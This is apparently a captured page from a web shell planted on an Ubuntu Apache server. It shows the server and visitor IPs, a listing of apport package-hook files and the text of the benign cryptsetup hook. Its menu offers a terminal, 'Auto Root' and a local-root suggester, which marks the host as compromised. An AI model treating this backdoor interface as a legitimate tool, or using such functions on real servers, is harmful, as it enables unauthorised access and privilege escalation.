Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
snap /
core20 /
2866 /
usr /
share /
apport /
package-hooks /
Delete
Unzip
Name
Size
Permission
Date
Action
cloud-init.py
176
B
-rw-r--r--
2025-06-26 00:09
cryptsetup.py
1.06
KB
-rw-r--r--
2025-01-30 03:37
isc-dhcp-client.py
1.75
KB
-rw-r--r--
2022-05-05 17:18
openssh-client.py
1.18
KB
-rw-r--r--
2026-03-06 04:37
openssh-server.py
1004
B
-rw-r--r--
2026-03-06 04:37
source_apparmor.py
2.76
KB
-rw-r--r--
2023-10-10 21:20
source_shadow.py
720
B
-rw-r--r--
2021-07-15 07:08
source_sudo.py
1.13
KB
-rw-r--r--
2025-06-26 05:10
systemd.py
872
B
-rw-r--r--
2026-03-14 01:48
udev.py
455
B
-rw-r--r--
2026-03-14 01:48
Save
Rename
'''apport package hook for cryptsetup (c) 2009 Author: Reinhard Tartler <siretart@tauware.de> (c) 2015 Author: Jonas Meurer <jonas@freesources.org> ''' from apport.hookutils import * msg = \ """ Providing additional information can help diagnose problems with cryptsetup. Specifically, this would include: - kernel cmdline (copy of /proc/cmdline). - crypttab configuration (copy of /etc/crypttab). - fstab configuration (copy of /etc/fstab). If this information is not relevant for your bug report or you have privacy concerns, please choose no. Do you want to provide additional information? (you will be able to review the data before it is sent) """ def add_info(report, ui): attach_files = False if ui: if ui.yesno(msg) == None: # user decided to cancel raise StopIteration # user is allowing files to be attached. attach_files = True if attach_files == False: # do not attach any files return attach_file(report, '/proc/cmdline', 'cmdline') attach_file(report, '/etc/fstab', 'fstab') attach_file_if_exists(report, '/etc/crypttab', 'crypttab')